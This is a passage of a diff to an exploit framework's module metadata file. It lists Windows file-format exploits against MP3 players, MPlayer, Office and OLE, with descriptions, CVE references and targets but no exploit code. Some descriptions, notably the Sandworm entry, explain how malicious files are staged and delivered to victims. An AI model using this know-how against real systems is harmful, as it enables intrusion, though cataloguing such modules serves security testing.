This is dangerous and would be unexpected to an end user.\n Executable files can live in a sub-directory so when the \".contact\" website link is clicked it traverses directories towards the executable and runs.\n Making matters worse is if the files are compressed then downloaded \"mark of the web\" (MOTW) may potentially not work as expected with certain archive utilitys.\n The \".\\\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.\n This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.", + "references": [ + "EDB-46188", + "URL-http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt", + "ZDI-19-013" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2022-12-04 17:41:24 +0000", + "path": "/modules/exploits/windows/fileformat/microsoft_windows_contact.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/microsoft_windows_contact", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/millenium_mp3_pls": { + "name": "Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/millenium_mp3_pls", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-07-30", + "type": "exploit", + "author": [ + "Molotov", + "dookie", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a 
browser, when the PLS extension is registered to Millenium MP3 Studio.\n This functionality has not been tested in this module.", + "references": [ + "OSVDB-56574", + "EDB-9618", + "EDB-10240" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/millenium_mp3_pls.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/millenium_mp3_pls", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mini_stream_pls_bof": { + "name": "Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/mini_stream_pls_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-07-16", + "type": "exploit", + "author": [ + "Madjix", + "Tiago Henriques", + "James Fitts " + ], + "description": "This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3\n Converter v3.1.2.1. 
The overflow is triggered when an unsuspecting victim\n opens the malicious PLS file.", + "references": [ + "CVE-2010-5081", + "OSVDB-78078", + "EDB-14373", + "BID-34514" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Mini-stream RM-MP3 Converter v3.1.2.1.2010.03.30" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mini_stream_pls_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mjm_coreplayer2011_s3m": { + "name": "MJM Core Player 2011 .s3m Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/mjm_coreplayer2011_s3m", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-04-30", + "type": "exploit", + "author": [ + "rick2600", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in MJM Core Player 2011\n When opening a malicious s3m file in this application, a stack buffer overflow can be\n triggered, resulting in arbitrary code execution.\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.", + "references": [ + "OSVDB-72101", + "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-004" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal Generic DEP & ASLR Bypass" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mjm_coreplayer2011_s3m", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/fileformat/mjm_quickplayer_s3m": { + "name": "MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/mjm_quickplayer_s3m", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-04-30", + "type": "exploit", + "author": [ + "rick2600", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a\n and QuickPlayer 2010 (Multi-target exploit). When opening a malicious s3m file in\n one of these 2 applications, a stack buffer overflow can be triggered, resulting in\n arbitrary code execution.\n\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.", + "references": [ + "OSVDB-72102", + "URL-http://www.corelan.be/advisories.php?id=CORELAN-11-003" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal Generic DEP & ASLR Bypass" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mjm_quickplayer_s3m", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/moxa_mediadbplayback": { + "name": "MOXA MediaDBPlayback ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/fileformat/moxa_mediadbplayback", + "aliases": [], + "rank": 200, + "disclosure_date": "2010-10-19", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. 
When\n sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-4742", + "OSVDB-68986", + "URL-http://www.moxa.com" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/moxa_mediadbplayback", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mplayer_m3u_bof": { + "name": "MPlayer Lite M3U Buffer Overflow", + "fullname": "exploit/windows/fileformat/mplayer_m3u_bof", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-03-19", + "type": "exploit", + "author": [ + "C4SS!0 and h1ch4m", + "Gabor Seljan" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n MPlayer Lite r33064, caused by improper bounds checking of an URL entry.\n\n By persuading the victim to open a specially-crafted .M3U file, specifically by\n drag-and-dropping it to the player, a remote attacker can execute arbitrary\n code on the system.", + "references": [ + "BID-46926", + "EDB-17013", + "URL-http://www.mplayer-ww.com/eng/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mplayer_m3u_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, 
+ "needs_cleanup": null + }, + "exploit_windows/fileformat/mplayer_sami_bof": { + "name": "MPlayer SAMI Subtitle File Buffer Overflow", + "fullname": "exploit/windows/fileformat/mplayer_sami_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-05-19", + "type": "exploit", + "author": [ + "Jacques Louw", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow found in the handling\n of SAMI subtitles files in MPlayer SVN Versions before 33471. It currently\n targets SMPlayer 0.6.8, which is distributed with a vulnerable version of MPlayer.\n\n The overflow is triggered when an unsuspecting victim opens a movie file first,\n followed by loading the malicious SAMI subtitles file from the GUI. Or, it can also\n be done from the console with the MPlayer \"-sub\" option.", + "references": [ + "BID-49149", + "OSVDB-74604", + "URL-http://labs.mwrinfosecurity.com/files/Advisories/mwri_mplayer-sami-subtitles_2011-08-12.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "SMPlayer 0.6.8 / mplayer.exe Sherpya-SVN-r29355-4.5.0 / Windows XP English SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mplayer_sami_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mplayer_sami_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms09_067_excel_featheader": { + "name": "MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability", + "fullname": "exploit/windows/fileformat/ms09_067_excel_featheader", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-11-10", + "type": "exploit", + "author": [ + "Sean Larsson", + "jduck " + ], + "description": "This module exploits a vulnerability in the handling of the FEATHEADER record\n by Microsoft Excel. 
Revisions of Office XP and later prior to the release of the\n MS09-067 bulletin are vulnerable.\n\n When processing a FEATHEADER (Shared Feature) record, Microsoft used a data\n structure from the file to calculate a pointer offset without doing proper\n validation. Attacker supplied data is then used to calculate the location of an\n object, and in turn a virtual function call. This results in arbitrary code\n execution.\n\n NOTE: On some versions of Office, the user will need to dismiss a warning dialog\n prior to the payload executing.", + "references": [ + "CVE-2009-3129", + "OSVDB-59860", + "MSB-MS09-067", + "BID-36945", + "ZDI-09-083", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=832" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office 2002 (XP) SP3 base English on Windows XP SP3 English", + "Microsoft Office 2002 (XP) SP3 w/kb969680 English on Windows XP SP3 English", + "Microsoft Office 2003 SP0 English on Windows XP SP3 English", + "Microsoft Office 2007 SP2 English on Windows XP SP3 English", + "Crash Target for Debugging" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms09_067_excel_featheader", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms10_004_textbytesatom": { + "name": "MS10-004 Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/ms10_004_textbytesatom", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-02-09", + "type": "exploit", + "author": [ + "SkD", + "Snake", + "jduck " + ], + "description": "This module exploits a stack buffer overflow vulnerability in the handling of\n the 
TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft,\n the PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as\n Office 2004 for Mac, are vulnerable.\n\n NOTE: The vulnerable code path is not reachable on versions of Windows prior to\n Windows Vista.", + "references": [ + "CVE-2010-0033", + "OSVDB-62241", + "MSB-MS10-004", + "ZDI-10-017" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft PowerPoint Viewer 2003", + "Microsoft PowerPoint Viewer 2003 (kb949041 or kb956500) or Office 2003 SP3", + "Microsoft PowerPoint Viewer 2003 (kb969615)", + "Crash Target for Debugging" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms10_004_textbytesatom", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms10_038_excel_obj_bof": { + "name": "MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow", + "fullname": "exploit/windows/fileformat/ms10_038_excel_obj_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-06-08", + "type": "exploit", + "author": [ + "Nicolas Joly", + "Shahin Ramezany ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP.\n By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker\n can get the control of the execution flow. 
This results in arbitrary code execution under\n the context of the user.", + "references": [ + "CVE-2010-0822", + "OSVDB-65236", + "BID-40520", + "MSB-MS10-038", + "URL-https://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office Excel 2002 10.2614.2625 Service Pack 0(Office XP) on Windows XP SP3", + "Microsoft Office Excel 2002 10.6501.6626 Service Pack 3 (Office XP SP3) on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms10_038_excel_obj_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms10_087_rtf_pfragments_bof": { + "name": "MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)", + "fullname": "exploit/windows/fileformat/ms10_087_rtf_pfragments_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-11-09", + "type": "exploit", + "author": [ + "wushi of team509", + "unknown", + "jduck ", + "DJ Manila Ice, Vesh, CA" + ], + "description": "This module exploits a stack-based buffer overflow in the handling of the\n 'pFragments' shape property within the Microsoft Word RTF parser. All versions\n of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the\n MS10-087 bulletin are vulnerable.\n\n This module does not attempt to exploit the vulnerability via Microsoft Outlook.\n\n The Microsoft Word RTF parser was only used by default in versions of Microsoft\n Word itself prior to Office 2007. With the release of Office 2007, Microsoft\n began using the Word RTF parser, by default, to handle rich-text messages within\n Outlook as well. 
It was possible to configure Outlook 2003 and earlier to use\n the Microsoft Word engine too, but it was not a default setting.\n\n It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that\n Microsoft will confirm or deny this since Office 2000 has reached its support\n cycle end-of-life.", + "references": [ + "CVE-2010-3333", + "OSVDB-69085", + "MSB-MS10-087", + "BID-44652", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Microsoft Office 2002 SP3 English on Windows XP SP3 English", + "Microsoft Office 2003 SP3 English on Windows XP SP3 English", + "Microsoft Office 2007 SP0 English on Windows XP SP3 English", + "Microsoft Office 2007 SP0 English on Windows Vista SP0 English", + "Microsoft Office 2007 SP0 English on Windows 7 SP0 English", + "Crash Target for Debugging" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms10_087_rtf_pfragments_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms11_006_createsizeddibsection": { + "name": "MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/ms11_006_createsizeddibsection", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-12-15", + "type": "exploit", + "author": [ + "Moti & Xu Hao", + "Yaniv Miron aka Lament of ilhack", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in the handling of thumbnails\n within .MIC files and various Office documents. 
When processing a thumbnail bitmap\n containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This\n leads to arbitrary code execution.\n\n In order to trigger the vulnerable code, the folder containing the document must be\n viewed using the \"Thumbnails\" view.", + "references": [ + "CVE-2010-3970", + "OSVDB-70263", + "MSB-MS11-006", + "BID-45662" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 SP0/SP4 English", + "Windows XP SP3 English", + "Crash Target for Debugging" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms11_006_createsizeddibsection", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms11_021_xlb_bof": { + "name": "MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow", + "fullname": "exploit/windows/fileformat/ms11_021_xlb_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-08-09", + "type": "exploit", + "author": [ + "Aniway", + "Unknown", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in Excel of Microsoft Office 2007.\n By supplying a malformed .xlb file, an attacker can control the content (source)\n of a memcpy routine, and the number of bytes to copy, therefore causing a stack-\n based buffer overflow. 
This results in arbitrary code execution under the context of\n the user.", + "references": [ + "CVE-2011-0105", + "OSVDB-71765", + "MSB-MS11-021", + "ZDI-11-121" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office Excel 2007 on Windows XP", + "Microsoft Office Excel 2007 SP2 on Windows XP" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms11_021_xlb_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms12_005": { + "name": "MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability", + "fullname": "exploit/windows/fileformat/ms12_005", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-01-10", + "type": "exploit", + "author": [ + "Yorick Koster", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Microsoft Office's ClickOnce\n feature. When handling a Macro document, the application fails to recognize\n certain file extensions as dangerous executables, which can be used to bypass\n the warning message. 
This can allow attackers to trick victims into opening the\n malicious document, which will load up either a python or ruby payload, and\n finally, download and execute an executable.", + "references": [ + "CVE-2012-0013", + "OSVDB-78207", + "MSB-MS12-005", + "BID-51284", + "URL-http://support.microsoft.com/default.aspx?scid=kb;EN-US;2584146", + "URL-http://exploitshop.wordpress.com/2012/01/14/ms12-005-embedded-object-package-allow-arbitrary-code-execution/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office Word 2007/2010 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms12_005.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms12_005", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms12_027_mscomctl_bof": { + "name": "MS12-027 MSCOMCTL ActiveX Buffer Overflow", + "fullname": "exploit/windows/fileformat/ms12_027_mscomctl_bof", + "aliases": [], + "rank": 200, + "disclosure_date": "2012-04-10", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious\n RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited\n in the wild on April 2012.\n\n This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office\n 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. 
This chain uses\n \"msgr3en.dll\", which will load after office got load, so the malicious file must\n be loaded through \"File / Open\" to achieve exploitation.", + "references": [ + "CVE-2012-0158", + "OSVDB-81125", + "BID-52911", + "MSB-MS12-027", + "URL-http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English", + "Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms12_027_mscomctl_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms13_071_theme": { + "name": "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution", + "fullname": "exploit/windows/fileformat/ms13_071_theme", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-09-10", + "type": "exploit", + "author": [ + "Eduardo Prado", + "juan vazquez ", + "Matthew Hall " + ], + "description": "This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows\n 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot]\n section. An arbitrary path can be used as screen saver, including a remote SMB resource,\n which allows for remote code execution when a malicious .theme file is opened, and the\n \"Screen Saver\" tab is viewed. 
The code execution is also triggered if the victim installs\n the malicious theme and stays away from the computer, when Windows tries to display the\n screensaver.", + "references": [ + "CVE-2013-0810", + "OSVDB-97136", + "MSB-MS13-071", + "BID-62176", + "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040", + "URL-https://www.rapid7.com/blog/post/2013/09/25/change-the-theme-get-a-shell" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 / Windows 2003 SP2" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/fileformat/ms13_071_theme.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms13_071_theme", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms14_017_rtf": { + "name": "MS14-017 Microsoft Word RTF Object Confusion", + "fullname": "exploit/windows/fileformat/ms14_017_rtf", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-04-01", + "type": "exploit", + "author": [ + "Haifei Li", + "Spencer McIntyre", + "unknown" + ], + "description": "This module creates a malicious RTF file that when opened in\n vulnerable versions of Microsoft Word will lead to code execution.\n The flaw exists in how a listoverridecount field can be modified\n to treat one structure as another.\n\n This bug was originally seen being exploited in the wild starting\n in April 2014. 
This module was created by reversing a public\n malware sample.", + "references": [ + "CVE-2014-1761", + "MSB-MS14-017", + "URL-http://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers", + "URL-https://www.virustotal.com/en/file/e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a/analysis/" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office 2010 SP2 English on Windows 7 SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms14_017_rtf.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms14_017_rtf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "screen-effects" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms14_060_sandworm": { + "name": "MS14-060 Microsoft Windows OLE Package Manager Code Execution", + "fullname": "exploit/windows/fileformat/ms14_060_sandworm", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-10-14", + "type": "exploit", + "author": [ + "Unknown", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, publicly known as \"Sandworm\". Platforms such as Windows\n Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be\n vulnerable. However, based on our testing, the most reliable setup is on Windows platforms\n running Office 2013 and Office 2010 SP2. 
And please keep in mind that some other setups such\n as using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to\n a failure in the CPackage::CreateTempFileName function.\n\n This module will generate three files: an INF, a GIF, and a PPSX file. You are required to\n set up a SMB or Samba 3 server and host the INF and GIF there. Systems such as Ubuntu or an\n older version of Windows (such as XP) work best for this because they require little\n configuration to get going. The PPSX file is what you should send to your target.\n\n In detail, the vulnerability has to do with how the Object Packager 2 component\n (packager.dll) handles an INF file that contains malicious registry changes, which may be\n leveraged for code execution. First of all, Packager does not load the INF file directly.\n As an attacker, you can trick it to load your INF anyway by embedding the file path as\n a remote share in an OLE object. The packager will then treat it as a type of media file,\n and load it with the packager!CPackage::OLE2MPlayerReadFromStream function, which will\n download it with a CopyFileW call, save it in a temp folder, and pass that information for\n later. The exploit will do this loading process twice: first for a fake gif file that's\n actually the payload, and the second for the INF file.\n\n The packager will also look at each OLE object's XML Presentation Command, specifically the\n type and cmd property. In the exploit, \"verb\" media command type is used, and this triggers\n the packager!CPackage::DoVerb function. Also, \"-3\" is used as the fake gif file's cmd\n property, and \"3\" is used for the INF. When the cmd is \"-3\", DoVerb will bail. 
But when \"3\"\n is used (again, for the INF file), it will cause the packager to try to find appropriate\n handler for it, which will end up with C:\\Windows\\System32\\infDefaultInstall.exe, and that\n will install/run the malicious INF file, and finally give us arbitrary code execution.", + "references": [ + "CVE-2014-4114", + "OSVDB-113140", + "MSB-MS14-060", + "BID-70419", + "URL-http://www.isightpartners.com/2014/10/cve-2014-4114/", + "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 SP1 / Office 2010 SP2 / Office 2013" + ], + "mod_time": "2023-03-13 10:31:27 +0000", + "path": "/modules/exploits/windows/fileformat/ms14_060_sandworm.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms14_060_sandworm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [], + "AKA": [ + "sandworm" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms14_064_packager_python": { + "name": "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python", + "fullname": "exploit/windows/fileformat/ms14_064_packager_python", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-11-12", + "type": "exploit", + "author": [ + "Haifei Li", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability\n publicly known as \"Sandworm\", on systems with Python for Windows installed. 
Windows Vista\n SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.\n However, based on our testing, the most reliable setup is on Windows platforms running\n Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as\n those using Office 2010 SP1 may be less stable, and may end up with a crash due to a\n failure in the CPackage::CreateTempFileName function.", + "references": [ + "CVE-2014-6352", + "MSB-MS14-064", + "BID-70690", + "URL-http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm" + ], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013" + ], + "mod_time": "2022-03-10 18:03:35 +0000", + "path": "/modules/exploits/windows/fileformat/ms14_064_packager_python.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms14_064_packager_python", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms14_064_packager_run_as_admin": { + "name": "MS14-064 Microsoft Windows OLE Package Manager Code Execution", + "fullname": "exploit/windows/fileformat/ms14_064_packager_run_as_admin", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-10-21", + "type": "exploit", + "author": [ + "Haifei Li", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.\n The Microsoft update tried to fix the vulnerability publicly known as \"Sandworm\". Platforms\n such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known\n to be vulnerable. 
